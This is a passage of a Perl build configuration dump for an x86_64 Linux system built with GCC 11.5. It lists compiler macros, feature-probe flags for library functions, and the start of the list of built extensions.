__INT_FAST16_MAX__=0x7fffffffffffffffL __INT_FAST16_TYPE__=long\ int __INT_FAST16_WIDTH__=64 __INT_FAST32_MAX__=0x7fffffffffffffffL __INT_FAST32_TYPE__=long\ int __INT_FAST32_WIDTH__=64 __INT_FAST64_MAX__=0x7fffffffffffffffL __INT_FAST64_TYPE__=long\ int __INT_FAST64_WIDTH__=64 __INT_FAST8_MAX__=0x7f __INT_FAST8_TYPE__=signed\ char __INT_FAST8_WIDTH__=8 __INT_LEAST16_MAX__=0x7fff __INT_LEAST16_TYPE__=short\ int __INT_LEAST16_WIDTH__=16 __INT_LEAST32_MAX__=0x7fffffff __INT_LEAST32_TYPE__=int __INT_LEAST32_WIDTH__=32 __INT_LEAST64_MAX__=0x7fffffffffffffffL __INT_LEAST64_TYPE__=long\ int __INT_LEAST64_WIDTH__=64 __INT_LEAST8_MAX__=0x7f __INT_LEAST8_TYPE__=signed\ char __INT_LEAST8_WIDTH__=8 __INT_MAX__=0x7fffffff __INT_WIDTH__=32 __LAHF_SAHF__=1 __LDBL_DECIMAL_DIG__=21 __LDBL_DENORM_MIN__=3.64519953188247460252840593361941982e-4951L __LDBL_DIG__=18 __LDBL_EPSILON__=1.08420217248550443400745280086994171e-19L __LDBL_HAS_DENORM__=1 __LDBL_HAS_INFINITY__=1 __LDBL_HAS_QUIET_NAN__=1 __LDBL_IS_IEC_60559__=2 __LDBL_MANT_DIG__=64 __LDBL_MAX_10_EXP__=4932 __LDBL_MAX_EXP__=16384 __LDBL_MAX__=1.18973149535723176502126385303097021e+4932L __LDBL_MIN_10_EXP__=(-4931) __LDBL_MIN_EXP__=(-16381) __LDBL_MIN__=3.36210314311209350626267781732175260e-4932L __LDBL_NORM_MAX__=1.18973149535723176502126385303097021e+4932L __LONG_LONG_MAX__=0x7fffffffffffffffLL __LONG_LONG_WIDTH__=64 __LONG_MAX__=0x7fffffffffffffffL __LONG_WIDTH__=64 __LP64__=1 __MMX_WITH_SSE__=1 __MMX__=1 __ORDER_BIG_ENDIAN__=4321 __ORDER_LITTLE_ENDIAN__=1234 __ORDER_PDP_ENDIAN__=3412 __PIC__=2 __POPCNT__=1 __PRAGMA_REDEFINE_EXTNAME=1 __PTRDIFF_MAX__=0x7fffffffffffffffL __PTRDIFF_TYPE__=long\ int __PTRDIFF_WIDTH__=64 __REGISTER_PREFIX__= __SCHAR_MAX__=0x7f __SCHAR_WIDTH__=8 __SEG_FS=1 __SEG_GS=1 __SHRT_MAX__=0x7fff __SHRT_WIDTH__=16 __SIG_ATOMIC_MAX__=0x7fffffff __SIG_ATOMIC_MIN__=(-0x7fffffff\ -\ 1) __SIG_ATOMIC_TYPE__=int __SIG_ATOMIC_WIDTH__=32 __SIZEOF_DOUBLE__=8 __SIZEOF_FLOAT128__=16 __SIZEOF_FLOAT80__=16 __SIZEOF_FLOAT__=4 __SIZEOF_INT128__=16 __SIZEOF_INT__=4 __SIZEOF_LONG_DOUBLE__=16 __SIZEOF_LONG_LONG__=8 __SIZEOF_LONG__=8 __SIZEOF_POINTER__=8 __SIZEOF_PTRDIFF_T__=8 __SIZEOF_SHORT__=2 __SIZEOF_SIZE_T__=8 __SIZEOF_WCHAR_T__=4 __SIZEOF_WINT_T__=4 __SIZE_MAX__=0xffffffffffffffffUL __SIZE_TYPE__=long\ unsigned\ int __SIZE_WIDTH__=64 __SSE2_MATH__=1 __SSE2__=1 __SSE3__=1 __SSE4_1__=1 __SSE4_2__=1 __SSE_MATH__=1 __SSE__=1 __SSSE3__=1 __STDC_HOSTED__=1 __STDC_IEC_559_COMPLEX__=1 __STDC_IEC_559__=1 __STDC_ISO_10646__=201706L __STDC_UTF_16__=1 __STDC_UTF_32__=1 __STDC_VERSION__=201710L __STDC__=1 __UINT16_C=__UINT16_C __UINT16_MAX__=0xffff __UINT16_TYPE__=short\ unsigned\ int __UINT32_C=__UINT32_C __UINT32_MAX__=0xffffffffU __UINT32_TYPE__=unsigned\ int __UINT64_C=__UINT64_C __UINT64_MAX__=0xffffffffffffffffUL __UINT64_TYPE__=long\ unsigned\ int __UINT8_C=__UINT8_C __UINT8_MAX__=0xff __UINT8_TYPE__=unsigned\ char __UINTMAX_C=__UINTMAX_C __UINTMAX_MAX__=0xffffffffffffffffUL __UINTMAX_TYPE__=long\ unsigned\ int __UINTPTR_MAX__=0xffffffffffffffffUL __UINTPTR_TYPE__=long\ unsigned\ int __UINT_FAST16_MAX__=0xffffffffffffffffUL __UINT_FAST16_TYPE__=long\ unsigned\ int __UINT_FAST32_MAX__=0xffffffffffffffffUL __UINT_FAST32_TYPE__=long\ unsigned\ int __UINT_FAST64_MAX__=0xffffffffffffffffUL __UINT_FAST64_TYPE__=long\ unsigned\ int __UINT_FAST8_MAX__=0xff __UINT_FAST8_TYPE__=unsigned\ char __UINT_LEAST16_MAX__=0xffff __UINT_LEAST16_TYPE__=short\ unsigned\ int __UINT_LEAST32_MAX__=0xffffffffU __UINT_LEAST32_TYPE__=unsigned\ int __UINT_LEAST64_MAX__=0xffffffffffffffffUL __UINT_LEAST64_TYPE__=long\ unsigned\ int __UINT_LEAST8_MAX__=0xff __UINT_LEAST8_TYPE__=unsigned\ char __USER_LABEL_PREFIX__= __USE_FILE_OFFSET64=1 __USE_GNU=1 __USE_LARGEFILE64=1 __USE_LARGEFILE=1 __USE_MISC=1 __USE_POSIX199309=1 __USE_POSIX199506=1 __USE_POSIX2=1 __USE_POSIX=1 __USE_UNIX98=1 __USE_XOPEN=1 __USE_XOPEN_EXTENDED=1 __VERSION__=&quot;11.5.0\ 20240719\ (Red\ Hat\ 11.5.0-5)&quot; __WCHAR_MAX__=0x7fffffff __WCHAR_MIN__=(-0x7fffffff\ -\ 1) __WCHAR_TYPE__=int __WCHAR_WIDTH__=32 __WINT_MAX__=0xffffffffU __WINT_MIN__=0U __WINT_TYPE__=unsigned\ int __WINT_WIDTH__=32 __amd64=1 __amd64__=1 __code_model_small__=1 __gnu_linux__=1 __k8=1 __k8__=1 __linux=1 __linux__=1 __pic__=2 __unix=1 __unix__=1 __x86_64=1 __x86_64__=1 linux=1 unix=1&#039;
crypt_r_proto=&#039;REENTRANT_PROTO_B_CCS&#039;
cryptlib=&#039;&#039;
csh=&#039;csh&#039;
ctermid_r_proto=&#039;0&#039;
ctime_r_proto=&#039;REENTRANT_PROTO_B_SB&#039;
d_Gconvert=&#039;gcvt((x),(n),(b))&#039;
d_PRIEUldbl=&#039;define&#039;
d_PRIFUldbl=&#039;define&#039;
d_PRIGUldbl=&#039;define&#039;
d_PRIXU64=&#039;define&#039;
d_PRId64=&#039;define&#039;
d_PRIeldbl=&#039;define&#039;
d_PRIfldbl=&#039;define&#039;
d_PRIgldbl=&#039;define&#039;
d_PRIi64=&#039;define&#039;
d_PRIo64=&#039;define&#039;
d_PRIu64=&#039;define&#039;
d_PRIx64=&#039;define&#039;
d_SCNfldbl=&#039;define&#039;
d__fwalk=&#039;undef&#039;
d_accept4=&#039;define&#039;
d_access=&#039;define&#039;
d_accessx=&#039;undef&#039;
d_acosh=&#039;define&#039;
d_aintl=&#039;undef&#039;
d_alarm=&#039;define&#039;
d_archlib=&#039;define&#039;
d_asctime64=&#039;undef&#039;
d_asctime_r=&#039;define&#039;
d_asinh=&#039;define&#039;
d_atanh=&#039;define&#039;
d_atolf=&#039;undef&#039;
d_atoll=&#039;define&#039;
d_attribute_always_inline=&#039;undef&#039;
d_attribute_deprecated=&#039;define&#039;
d_attribute_format=&#039;define&#039;
d_attribute_malloc=&#039;define&#039;
d_attribute_nonnull=&#039;define&#039;
d_attribute_noreturn=&#039;define&#039;
d_attribute_pure=&#039;define&#039;
d_attribute_unused=&#039;define&#039;
d_attribute_warn_unused_result=&#039;define&#039;
d_backtrace=&#039;define&#039;
d_bsd=&#039;undef&#039;
d_bsdgetpgrp=&#039;undef&#039;
d_bsdsetpgrp=&#039;undef&#039;
d_builtin_add_overflow=&#039;define&#039;
d_builtin_choose_expr=&#039;define&#039;
d_builtin_expect=&#039;define&#039;
d_builtin_mul_overflow=&#039;define&#039;
d_builtin_sub_overflow=&#039;define&#039;
d_c99_variadic_macros=&#039;define&#039;
d_casti32=&#039;undef&#039;
d_castneg=&#039;define&#039;
d_cbrt=&#039;define&#039;
d_chown=&#039;define&#039;
d_chroot=&#039;define&#039;
d_chsize=&#039;undef&#039;
d_class=&#039;undef&#039;
d_clearenv=&#039;define&#039;
d_closedir=&#039;define&#039;
d_cmsghdr_s=&#039;define&#039;
d_copysign=&#039;define&#039;
d_copysignl=&#039;define&#039;
d_cplusplus=&#039;undef&#039;
d_crypt=&#039;define&#039;
d_crypt_r=&#039;define&#039;
d_csh=&#039;undef&#039;
d_ctermid=&#039;define&#039;
d_ctermid_r=&#039;undef&#039;
d_ctime64=&#039;undef&#039;
d_ctime_r=&#039;define&#039;
d_cuserid=&#039;define&#039;
d_dbminitproto=&#039;define&#039;
d_difftime=&#039;define&#039;
d_difftime64=&#039;undef&#039;
d_dir_dd_fd=&#039;undef&#039;
d_dirfd=&#039;define&#039;
d_dirnamlen=&#039;undef&#039;
d_dladdr=&#039;define&#039;
d_dlerror=&#039;define&#039;
d_dlopen=&#039;define&#039;
d_dlsymun=&#039;undef&#039;
d_dosuid=&#039;undef&#039;
d_double_has_inf=&#039;define&#039;
d_double_has_nan=&#039;define&#039;
d_double_has_negative_zero=&#039;define&#039;
d_double_has_subnormals=&#039;define&#039;
d_double_style_cray=&#039;undef&#039;
d_double_style_ibm=&#039;undef&#039;
d_double_style_ieee=&#039;define&#039;
d_double_style_vax=&#039;undef&#039;
d_drand48_r=&#039;define&#039;
d_drand48proto=&#039;define&#039;
d_dup2=&#039;define&#039;
d_dup3=&#039;define&#039;
d_duplocale=&#039;define&#039;
d_eaccess=&#039;define&#039;
d_endgrent=&#039;define&#039;
d_endgrent_r=&#039;undef&#039;
d_endhent=&#039;define&#039;
d_endhostent_r=&#039;undef&#039;
d_endnent=&#039;define&#039;
d_endnetent_r=&#039;undef&#039;
d_endpent=&#039;define&#039;
d_endprotoent_r=&#039;undef&#039;
d_endpwent=&#039;define&#039;
d_endpwent_r=&#039;undef&#039;
d_endsent=&#039;define&#039;
d_endservent_r=&#039;undef&#039;
d_eofnblk=&#039;define&#039;
d_erf=&#039;define&#039;
d_erfc=&#039;define&#039;
d_eunice=&#039;undef&#039;
d_exp2=&#039;define&#039;
d_expm1=&#039;define&#039;
d_faststdio=&#039;undef&#039;
d_fchdir=&#039;define&#039;
d_fchmod=&#039;define&#039;
d_fchmodat=&#039;define&#039;
d_fchown=&#039;define&#039;
d_fcntl=&#039;define&#039;
d_fcntl_can_lock=&#039;define&#039;
d_fd_macros=&#039;define&#039;
d_fd_set=&#039;define&#039;
d_fdclose=&#039;undef&#039;
d_fdim=&#039;define&#039;
d_fdopendir=&#039;define&#039;
d_fds_bits=&#039;define&#039;
d_fegetround=&#039;define&#039;
d_fgetpos=&#039;define&#039;
d_finite=&#039;define&#039;
d_finitel=&#039;define&#039;
d_flexfnam=&#039;define&#039;
d_flock=&#039;define&#039;
d_flockproto=&#039;define&#039;
d_fma=&#039;define&#039;
d_fmax=&#039;define&#039;
d_fmin=&#039;define&#039;
d_fork=&#039;define&#039;
d_fp_class=&#039;undef&#039;
d_fp_classify=&#039;undef&#039;
d_fp_classl=&#039;undef&#039;
d_fpathconf=&#039;define&#039;
d_fpclass=&#039;undef&#039;
d_fpclassify=&#039;define&#039;
d_fpclassl=&#039;undef&#039;
d_fpgetround=&#039;undef&#039;
d_fpos64_t=&#039;undef&#039;
d_freelocale=&#039;define&#039;
d_frexpl=&#039;define&#039;
d_fs_data_s=&#039;undef&#039;
d_fseeko=&#039;define&#039;
d_fsetpos=&#039;define&#039;
d_fstatfs=&#039;define&#039;
d_fstatvfs=&#039;define&#039;
d_fsync=&#039;define&#039;
d_ftello=&#039;define&#039;
d_ftime=&#039;undef&#039;
d_futimes=&#039;define&#039;
d_gai_strerror=&#039;define&#039;
d_gdbm_ndbm_h_uses_prototypes=&#039;undef&#039;
d_gdbmndbm_h_uses_prototypes=&#039;define&#039;
d_getaddrinfo=&#039;define&#039;
d_getcwd=&#039;define&#039;
d_getespwnam=&#039;undef&#039;
d_getfsstat=&#039;undef&#039;
d_getgrent=&#039;define&#039;
d_getgrent_r=&#039;define&#039;
d_getgrgid_r=&#039;define&#039;
d_getgrnam_r=&#039;define&#039;
d_getgrps=&#039;define&#039;
d_gethbyaddr=&#039;define&#039;
d_gethbyname=&#039;define&#039;
d_gethent=&#039;define&#039;
d_gethname=&#039;define&#039;
d_gethostbyaddr_r=&#039;define&#039;
d_gethostbyname_r=&#039;define&#039;
d_gethostent_r=&#039;define&#039;
d_gethostprotos=&#039;define&#039;
d_getitimer=&#039;define&#039;
d_getlogin=&#039;define&#039;
d_getlogin_r=&#039;define&#039;
d_getmnt=&#039;undef&#039;
d_getmntent=&#039;define&#039;
d_getnameinfo=&#039;define&#039;
d_getnbyaddr=&#039;define&#039;
d_getnbyname=&#039;define&#039;
d_getnent=&#039;define&#039;
d_getnetbyaddr_r=&#039;define&#039;
d_getnetbyname_r=&#039;define&#039;
d_getnetent_r=&#039;define&#039;
d_getnetprotos=&#039;define&#039;
d_getpagsz=&#039;define&#039;
d_getpbyname=&#039;define&#039;
d_getpbynumber=&#039;define&#039;
d_getpent=&#039;define&#039;
d_getpgid=&#039;define&#039;
d_getpgrp=&#039;define&#039;
d_getpgrp2=&#039;undef&#039;
d_getppid=&#039;define&#039;
d_getprior=&#039;define&#039;
d_getprotobyname_r=&#039;define&#039;
d_getprotobynumber_r=&#039;define&#039;
d_getprotoent_r=&#039;define&#039;
d_getprotoprotos=&#039;define&#039;
d_getprpwnam=&#039;undef&#039;
d_getpwent=&#039;define&#039;
d_getpwent_r=&#039;define&#039;
d_getpwnam_r=&#039;define&#039;
d_getpwuid_r=&#039;define&#039;
d_getsbyname=&#039;define&#039;
d_getsbyport=&#039;define&#039;
d_getsent=&#039;define&#039;
d_getservbyname_r=&#039;define&#039;
d_getservbyport_r=&#039;define&#039;
d_getservent_r=&#039;define&#039;
d_getservprotos=&#039;define&#039;
d_getspnam=&#039;define&#039;
d_getspnam_r=&#039;define&#039;
d_gettimeod=&#039;define&#039;
d_gmtime64=&#039;undef&#039;
d_gmtime_r=&#039;define&#039;
d_gnulibc=&#039;define&#039;
d_grpasswd=&#039;define&#039;
d_has_C_UTF8=&#039;true&#039;
d_hasmntopt=&#039;define&#039;
d_htonl=&#039;define&#039;
d_hypot=&#039;define&#039;
d_ilogb=&#039;define&#039;
d_ilogbl=&#039;define&#039;
d_inc_version_list=&#039;undef&#039;
d_inetaton=&#039;define&#039;
d_inetntop=&#039;define&#039;
d_inetpton=&#039;define&#039;
d_int64_t=&#039;define&#039;
d_ip_mreq=&#039;define&#039;
d_ip_mreq_source=&#039;define&#039;
d_ipv6_mreq=&#039;define&#039;
d_ipv6_mreq_source=&#039;undef&#039;
d_isascii=&#039;define&#039;
d_isblank=&#039;define&#039;
d_isfinite=&#039;define&#039;
d_isfinitel=&#039;undef&#039;
d_isinf=&#039;define&#039;
d_isinfl=&#039;define&#039;
d_isless=&#039;define&#039;
d_isnan=&#039;define&#039;
d_isnanl=&#039;define&#039;
d_isnormal=&#039;define&#039;
d_j0=&#039;define&#039;
d_j0l=&#039;define&#039;
d_killpg=&#039;define&#039;
d_lc_monetary_2008=&#039;define&#039;
d_lchown=&#039;define&#039;
d_ldbl_dig=&#039;define&#039;
d_ldexpl=&#039;define&#039;
d_lgamma=&#039;define&#039;
d_lgamma_r=&#039;define&#039;
d_libm_lib_version=&#039;undef&#039;
d_libname_unique=&#039;undef&#039;
d_link=&#039;define&#039;
d_linkat=&#039;define&#039;
d_llrint=&#039;define&#039;
d_llrintl=&#039;define&#039;
d_llround=&#039;define&#039;
d_llroundl=&#039;define&#039;
d_localeconv_l=&#039;undef&#039;
d_localtime64=&#039;undef&#039;
d_localtime_r=&#039;define&#039;
d_localtime_r_needs_tzset=&#039;define&#039;
d_locconv=&#039;define&#039;
d_lockf=&#039;define&#039;
d_log1p=&#039;define&#039;
d_log2=&#039;define&#039;
d_logb=&#039;define&#039;
d_long_double_style_ieee=&#039;define&#039;
d_long_double_style_ieee_doubledouble=&#039;undef&#039;
d_long_double_style_ieee_extended=&#039;define&#039;
d_long_double_style_ieee_std=&#039;undef&#039;
d_long_double_style_vax=&#039;undef&#039;
d_longdbl=&#039;define&#039;
d_longlong=&#039;define&#039;
d_lrint=&#039;define&#039;
d_lrintl=&#039;define&#039;
d_lround=&#039;define&#039;
d_lroundl=&#039;define&#039;
d_lseekproto=&#039;define&#039;
d_lstat=&#039;define&#039;
d_madvise=&#039;define&#039;
d_malloc_good_size=&#039;undef&#039;
d_malloc_size=&#039;undef&#039;
d_malloc_usable_size=&#039;define&#039;
d_mblen=&#039;define&#039;
d_mbrlen=&#039;define&#039;
d_mbrtowc=&#039;define&#039;
d_mbstowcs=&#039;define&#039;
d_mbtowc=&#039;define&#039;
d_memmem=&#039;define&#039;
d_memrchr=&#039;define&#039;
d_mkdir=&#039;define&#039;
d_mkdtemp=&#039;define&#039;
d_mkfifo=&#039;define&#039;
d_mkostemp=&#039;define&#039;
d_mkstemp=&#039;define&#039;
d_mkstemps=&#039;define&#039;
d_mktime=&#039;define&#039;
d_mktime64=&#039;undef&#039;
d_mmap=&#039;define&#039;
d_modfl=&#039;define&#039;
d_modflproto=&#039;define&#039;
d_mprotect=&#039;define&#039;
d_msg=&#039;define&#039;
d_msg_ctrunc=&#039;define&#039;
d_msg_dontroute=&#039;define&#039;
d_msg_oob=&#039;define&#039;
d_msg_peek=&#039;define&#039;
d_msg_proxy=&#039;define&#039;
d_msgctl=&#039;define&#039;
d_msgget=&#039;define&#039;
d_msghdr_s=&#039;define&#039;
d_msgrcv=&#039;define&#039;
d_msgsnd=&#039;define&#039;
d_msync=&#039;define&#039;
d_munmap=&#039;define&#039;
d_mymalloc=&#039;undef&#039;
d_nan=&#039;define&#039;
d_nanosleep=&#039;define&#039;
d_ndbm=&#039;define&#039;
d_ndbm_h_uses_prototypes=&#039;undef&#039;
d_nearbyint=&#039;define&#039;
d_newlocale=&#039;define&#039;
d_nextafter=&#039;define&#039;
d_nexttoward=&#039;define&#039;
d_nice=&#039;define&#039;
d_nl_langinfo=&#039;define&#039;
d_nv_preserves_uv=&#039;undef&#039;
d_nv_zero_is_allbits_zero=&#039;define&#039;
d_off64_t=&#039;define&#039;
d_old_pthread_create_joinable=&#039;undef&#039;
d_oldpthreads=&#039;undef&#039;
d_oldsock=&#039;undef&#039;
d_open3=&#039;define&#039;
d_openat=&#039;define&#039;
d_pathconf=&#039;define&#039;
d_pause=&#039;define&#039;
d_perl_otherlibdirs=&#039;undef&#039;
d_phostname=&#039;undef&#039;
d_pipe=&#039;define&#039;
d_pipe2=&#039;define&#039;
d_poll=&#039;define&#039;
d_portable=&#039;define&#039;
d_prctl=&#039;define&#039;
d_prctl_set_name=&#039;define&#039;
d_printf_format_null=&#039;define&#039;
d_procselfexe=&#039;define&#039;
d_pseudofork=&#039;undef&#039;
d_pthread_atfork=&#039;define&#039;
d_pthread_attr_setscope=&#039;define&#039;
d_pthread_yield=&#039;define&#039;
d_ptrdiff_t=&#039;define&#039;
d_pwage=&#039;undef&#039;
d_pwchange=&#039;undef&#039;
d_pwclass=&#039;undef&#039;
d_pwcomment=&#039;undef&#039;
d_pwexpire=&#039;undef&#039;
d_pwgecos=&#039;define&#039;
d_pwpasswd=&#039;define&#039;
d_pwquota=&#039;undef&#039;
d_qgcvt=&#039;define&#039;
d_quad=&#039;define&#039;
d_querylocale=&#039;undef&#039;
d_random_r=&#039;define&#039;
d_re_comp=&#039;undef&#039;
d_readdir=&#039;define&#039;
d_readdir64_r=&#039;define&#039;
d_readdir_r=&#039;define&#039;
d_readlink=&#039;define&#039;
d_readv=&#039;define&#039;
d_recvmsg=&#039;define&#039;
d_regcmp=&#039;undef&#039;
d_regcomp=&#039;define&#039;
d_remainder=&#039;define&#039;
d_remquo=&#039;define&#039;
d_rename=&#039;define&#039;
d_renameat=&#039;define&#039;
d_rewinddir=&#039;define&#039;
d_rint=&#039;define&#039;
d_rmdir=&#039;define&#039;
d_round=&#039;define&#039;
d_sbrkproto=&#039;define&#039;
d_scalbn=&#039;define&#039;
d_scalbnl=&#039;define&#039;
d_sched_yield=&#039;define&#039;
d_scm_rights=&#039;define&#039;
d_seekdir=&#039;define&#039;
d_select=&#039;define&#039;
d_sem=&#039;define&#039;
d_semctl=&#039;define&#039;
d_semctl_semid_ds=&#039;define&#039;
d_semctl_semun=&#039;define&#039;
d_semget=&#039;define&#039;
d_semop=&#039;define&#039;
d_sendmsg=&#039;define&#039;
d_setegid=&#039;define&#039;
d_seteuid=&#039;define&#039;
d_setgrent=&#039;define&#039;
d_setgrent_r=&#039;undef&#039;
d_setgrps=&#039;define&#039;
d_sethent=&#039;define&#039;
d_sethostent_r=&#039;undef&#039;
d_setitimer=&#039;define&#039;
d_setlinebuf=&#039;define&#039;
d_setlocale=&#039;define&#039;
d_setlocale_accepts_any_locale_name=&#039;undef&#039;
d_setlocale_r=&#039;undef&#039;
d_setnent=&#039;define&#039;
d_setnetent_r=&#039;undef&#039;
d_setpent=&#039;define&#039;
d_setpgid=&#039;define&#039;
d_setpgrp=&#039;define&#039;
d_setpgrp2=&#039;undef&#039;
d_setprior=&#039;define&#039;
d_setproctitle=&#039;undef&#039;
d_setprotoent_r=&#039;undef&#039;
d_setpwent=&#039;define&#039;
d_setpwent_r=&#039;undef&#039;
d_setregid=&#039;define&#039;
d_setresgid=&#039;define&#039;
d_setresuid=&#039;define&#039;
d_setreuid=&#039;define&#039;
d_setrgid=&#039;undef&#039;
d_setruid=&#039;undef&#039;
d_setsent=&#039;define&#039;
d_setservent_r=&#039;undef&#039;
d_setsid=&#039;define&#039;
d_setvbuf=&#039;define&#039;
d_shm=&#039;define&#039;
d_shmat=&#039;define&#039;
d_shmatprototype=&#039;define&#039;
d_shmctl=&#039;define&#039;
d_shmdt=&#039;define&#039;
d_shmget=&#039;define&#039;
d_sigaction=&#039;define&#039;
d_siginfo_si_addr=&#039;define&#039;
d_siginfo_si_band=&#039;define&#039;
d_siginfo_si_errno=&#039;define&#039;
d_siginfo_si_fd=&#039;define&#039;
d_siginfo_si_pid=&#039;define&#039;
d_siginfo_si_status=&#039;define&#039;
d_siginfo_si_uid=&#039;define&#039;
d_siginfo_si_value=&#039;define&#039;
d_signbit=&#039;define&#039;
d_sigprocmask=&#039;define&#039;
d_sigsetjmp=&#039;define&#039;
d_sin6_scope_id=&#039;define&#039;
d_sitearch=&#039;define&#039;
d_snprintf=&#039;define&#039;
d_sockaddr_in6=&#039;define&#039;
d_sockaddr_sa_len=&#039;undef&#039;
d_sockaddr_storage=&#039;define&#039;
d_sockatmark=&#039;define&#039;
d_sockatmarkproto=&#039;define&#039;
d_socket=&#039;define&#039;
d_socklen_t=&#039;define&#039;
d_sockpair=&#039;define&#039;
d_socks5_init=&#039;undef&#039;
d_sqrtl=&#039;define&#039;
d_srand48_r=&#039;define&#039;
d_srandom_r=&#039;define&#039;
d_sresgproto=&#039;define&#039;
d_sresuproto=&#039;define&#039;
d_stat=&#039;define&#039;
d_statblks=&#039;define&#039;
d_statfs_f_flags=&#039;define&#039;
d_statfs_s=&#039;define&#039;
d_static_inline=&#039;define&#039;
d_statvfs=&#039;define&#039;
d_stdio_cnt_lval=&#039;undef&#039;
d_stdio_ptr_lval=&#039;undef&#039;
d_stdio_ptr_lval_nochange_cnt=&#039;undef&#039;
d_stdio_ptr_lval_sets_cnt=&#039;undef&#039;
d_stdio_stream_array=&#039;undef&#039;
d_stdiobase=&#039;undef&#039;
d_stdstdio=&#039;undef&#039;
d_strcoll=&#039;define&#039;
d_strerror_l=&#039;define&#039;
d_strerror_r=&#039;define&#039;
d_strftime=&#039;define&#039;
d_strlcat=&#039;undef&#039;
d_strlcpy=&#039;undef&#039;
d_strnlen=&#039;define&#039;
d_strtod=&#039;define&#039;
d_strtod_l=&#039;define&#039;
d_strtol=&#039;define&#039;
d_strtold=&#039;define&#039;
d_strtold_l=&#039;define&#039;
d_strtoll=&#039;define&#039;
d_strtoq=&#039;define&#039;
d_strtoul=&#039;define&#039;
d_strtoull=&#039;define&#039;
d_strtouq=&#039;define&#039;
d_strxfrm=&#039;define&#039;
d_suidsafe=&#039;undef&#039;
d_symlink=&#039;define&#039;
d_syscall=&#039;define&#039;
d_syscallproto=&#039;define&#039;
d_sysconf=&#039;define&#039;
d_sysernlst=&#039;&#039;
d_syserrlst=&#039;undef&#039;
d_system=&#039;define&#039;
d_tcgetpgrp=&#039;define&#039;
d_tcsetpgrp=&#039;define&#039;
d_telldir=&#039;define&#039;
d_telldirproto=&#039;define&#039;
d_tgamma=&#039;define&#039;
d_thread_safe_nl_langinfo_l=&#039;define&#039;
d_time=&#039;define&#039;
d_timegm=&#039;define&#039;
d_times=&#039;define&#039;
d_tm_tm_gmtoff=&#039;define&#039;
d_tm_tm_zone=&#039;define&#039;
d_tmpnam_r=&#039;define&#039;
d_towlower=&#039;define&#039;
d_towupper=&#039;define&#039;
d_trunc=&#039;define&#039;
d_truncate=&#039;define&#039;
d_truncl=&#039;define&#039;
d_ttyname_r=&#039;define&#039;
d_tzname=&#039;define&#039;
d_u32align=&#039;define&#039;
d_ualarm=&#039;define&#039;
d_umask=&#039;define&#039;
d_uname=&#039;define&#039;
d_union_semun=&#039;undef&#039;
d_unlinkat=&#039;define&#039;
d_unordered=&#039;undef&#039;
d_unsetenv=&#039;define&#039;
d_uselocale=&#039;define&#039;
d_usleep=&#039;define&#039;
d_usleepproto=&#039;define&#039;
d_ustat=&#039;undef&#039;
d_vendorarch=&#039;define&#039;
d_vendorbin=&#039;define&#039;
d_vendorlib=&#039;define&#039;
d_vendorscript=&#039;define&#039;
d_vfork=&#039;undef&#039;
d_void_closedir=&#039;undef&#039;
d_voidsig=&#039;define&#039;
d_voidtty=&#039;&#039;
d_vsnprintf=&#039;define&#039;
d_wait4=&#039;define&#039;
d_waitpid=&#039;define&#039;
d_wcrtomb=&#039;define&#039;
d_wcscmp=&#039;define&#039;
d_wcstombs=&#039;define&#039;
d_wcsxfrm=&#039;define&#039;
d_wctomb=&#039;define&#039;
d_writev=&#039;define&#039;
d_xenix=&#039;undef&#039;
date=&#039;date&#039;
db_hashtype=&#039;u_int32_t&#039;
db_prefixtype=&#039;size_t&#039;
db_version_major=&#039;5&#039;
db_version_minor=&#039;3&#039;
db_version_patch=&#039;28&#039;
default_inc_excludes_dot=&#039;define&#039;
direntrytype=&#039;struct dirent&#039;
dlext=&#039;so&#039;
dlsrc=&#039;dl_dlopen.xs&#039;
doubleinfbytes=&#039;0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f&#039;
doublekind=&#039;3&#039;
doublemantbits=&#039;52&#039;
doublenanbytes=&#039;0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf8, 0xff&#039;
doublesize=&#039;8&#039;
drand01=&#039;Perl_drand48()&#039;
drand48_r_proto=&#039;REENTRANT_PROTO_I_ST&#039;
dtrace=&#039;/usr/bin/dtrace&#039;
dtraceobject=&#039;define&#039;
dtracexnolibs=&#039;undef&#039;
dynamic_ext=&#039;B Compress/Raw/Bzip2 Compress/Raw/Zlib Cwd DB_File Data/Dumper Devel/PPPort Devel/Peek Digest/MD5 Digest/SHA Encode Fcntl File/DosGlob File/Glob Filter/Util/Call GDBM_File Hash/Util Hash/Util/FieldHash I18N/Langinfo IO IPC/SysV List/Util MIME/Base64 Math/BigInt/FastCalc NDBM_File ODBM_File Opcode POSIX PerlIO/encoding PerlIO/mmap PerlIO/scalar PerlIO/via SDBM_File Socket Storable Sys/Hostname Sys/Syslog Time/HiRes Time/Piece Unicode/Collate Unicode/Normalize XS/APItest XS/Typemap attributes mro re threads threads/shared&#039;
eagain=&#039;EAGAIN&#039;
ebcdic=&#039;undef&#039;
echo=&#039;echo&#039;
egrep=&#039;egrep&#039;
emacs=&#039;&#039;
endgrent_r_proto=&#039;0&#039;
endhostent_r_proto=&#039;0&#039;
endnetent_r_proto=&#039;0&#039;
endprotoent_r_proto=&#039;0&#039;
endpwent_r_proto=&#039;0&#039;
endservent_r_proto=&#039;0&#039;
eunicefix=&#039;:&#039;
exe_ext=&#039;&#039;
expr=&#039;expr&#039;
extensions=&#039;B Compress/Raw/Bzip2 Compress/Raw/Zlib Cwd DB_File Data/Dumper Devel/PPPort Devel/Peek Digest/MD5 Digest/SHA Encode Fcntl File/DosGlob File/Glob Filter/Util/Call GDBM_File Hash/Util Hash/Util/FieldHash I18N/Langinfo IO IPC/SysV List/Util MIME/Base64 Math/BigInt/FastCalc NDBM_File ODBM_File Opcode POSIX PerlIO/encoding PerlIO/mmap PerlIO/scalar PerlIO/via SDBM_File Socket Storable Sys/Hostname Sys/Syslog Time/HiRes Time/Piece Unicode/Collate Unicode/Normalize XS/APItest XS/Typemap attributes mro re threads threads/shared Archive/Tar Attribute/Handlers AutoLoader CPAN CPAN/Meta CPAN/Meta/Requirements CPAN/Meta/YAML Carp Config/Perl/V Devel/SelfStubber Digest Dumpvalue Env Errno Exporter ExtUtils/CBuilder ExtUtils/Constant ExtUtils/Install ExtUtils/MakeMaker ExtUtils/Manifest ExtUtils/Miniperl ExtUtils/ParseXS File/Fetch File/Find File/Path File/Temp FileCache Filter/Simple FindBin Getopt/Long HTTP/Tiny I18N/Collate I18N/LangTags IO/Compress IO/Socket/IP IO/Zlib IPC/Cmd IPC/Open3 JSON/PP Locale/Maketext Locale/Maketext/Simple Math/BigInt Math/BigRat Math/Complex Memoize Module/CoreList Module/Load 